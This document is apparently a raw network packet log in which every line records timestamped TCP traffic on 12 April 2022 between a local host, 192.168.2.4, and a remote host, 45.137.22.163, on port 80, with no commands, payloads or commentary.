                                              Apr 12, 2022 20:22:50.396701097 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396728039 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396739960 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.396754026 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396783113 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396795034 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.396810055 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396835089 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396848917 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.396862030 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396888971 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396902084 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.396914959 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396944046 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396960020 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.396969080 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.396996021 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397006989 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397022963 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397049904 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397062063 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397077084 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397104025 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397118092 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397130966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397160053 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397172928 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397186041 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397212029 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397222996 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397238016 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397264004 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397279024 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397289991 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397315979 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397327900 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397342920 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397372007 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397382975 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397423029 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397449970 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397460938 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397474051 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397500992 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397511959 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397526979 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397553921 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397563934 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397582054 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397599936 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397627115 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397629976 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397653103 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397682905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397696018 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397732973 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397759914 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397773981 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397785902 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397811890 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397825956 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397838116 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397865057 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397877932 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397893906 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397938967 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397952080 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.397964954 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.397994041 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398004055 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398035049 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398062944 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398073912 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398087978 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398113966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398133039 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398139954 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398179054 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398180008 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398207903 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398231030 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398246050 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398252010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398273945 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398298979 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398315907 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398317099 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398344040 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398369074 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398381948 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398397923 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398422003 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398437023 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398448944 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398484945 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398502111 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398509979 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398538113 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398550987 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398564100 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398591042 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398602962 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398618937 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398643970 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398664951 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398670912 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398704052 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398710012 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398715019 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398741961 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398756981 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398766994 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398786068 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398808956 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398811102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398835897 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398863077 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398875952 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398889065 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398915052 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398926973 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398941994 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398968935 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.398983002 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.398994923 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399022102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399034977 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.399046898 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399075031 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399091959 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.399101019 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399127960 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399146080 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.399154902 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399173021 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.399241924 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410125017 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410147905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410180092 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410200119 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410216093 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410221100 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410232067 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410252094 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410269022 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410269022 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410280943 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410294056 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410335064 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410471916 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410474062 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410480022 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410531044 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410556078 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410634041 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.410681963 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.410692930 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411139011 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411195993 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.411350965 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411437988 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411489010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.411616087 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411674976 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411716938 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.411744118 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.411761999 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417390108 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.417679071 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417701960 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417723894 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417736053 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.417748928 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417766094 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.417774916 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422194004 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422280073 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422312975 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422354937 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422384977 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422400951 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422415018 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422442913 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422451019 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422472954 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422499895 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422513962 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422528982 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422558069 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422571898 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422586918 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422615051 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422642946 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422653913 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422673941 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422708035 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422718048 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422744036 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422765017 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422787905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422815084 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422846079 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422851086 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422879934 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422909975 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422919989 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422947884 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.422976017 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.422986031 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423016071 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423044920 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423053026 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423078060 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423106909 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423109055 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423139095 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423167944 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423188925 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423238993 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423249006 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423279047 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423309088 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423324108 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423338890 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423388004 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423418045 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423429012 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423448086 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423461914 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423499107 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423530102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423547029 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423558950 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423585892 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423600912 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423614025 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423644066 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423654079 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423695087 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423731089 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423744917 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423751116 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423783064 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423827887 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423841953 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423856974 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423886061 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423897982 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423913002 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423943043 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.423954010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.423970938 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424000025 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424010992 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424027920 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424056053 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424071074 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424083948 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424113989 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424135923 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424141884 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424170971 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424185038 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424197912 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424226999 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424237967 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424256086 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424283981 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424298048 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424312115 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424339056 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424351931 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424367905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424398899 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424410105 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424426079 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424453974 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424482107 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424487114 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424508095 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424536943 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424542904 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.424562931 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.424592972 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425086021 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425113916 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425137043 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425142050 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425167084 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425194979 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425195932 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425224066 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425240993 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425251961 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425281048 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425295115 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425307989 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425334930 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425343990 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425363064 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425391912 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425403118 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425420046 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425447941 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425462008 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425476074 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425504923 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425515890 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425533056 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425561905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425571918 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425590992 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425617933 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425632954 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425645113 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425673008 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425690889 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425702095 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425730944 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425740957 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425757885 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425785065 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425797939 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425815105 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425841093 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425856113 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425869942 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425896883 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425909996 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425925016 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425955057 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.425966024 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.425997019 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426024914 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426040888 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.426053047 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426080942 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426091909 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.426107883 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426137924 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426155090 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.426201105 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426232100 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426249981 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.426259041 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426287889 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.426294088 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.426316977 CEST804973845.137.22.163192.168.2.4
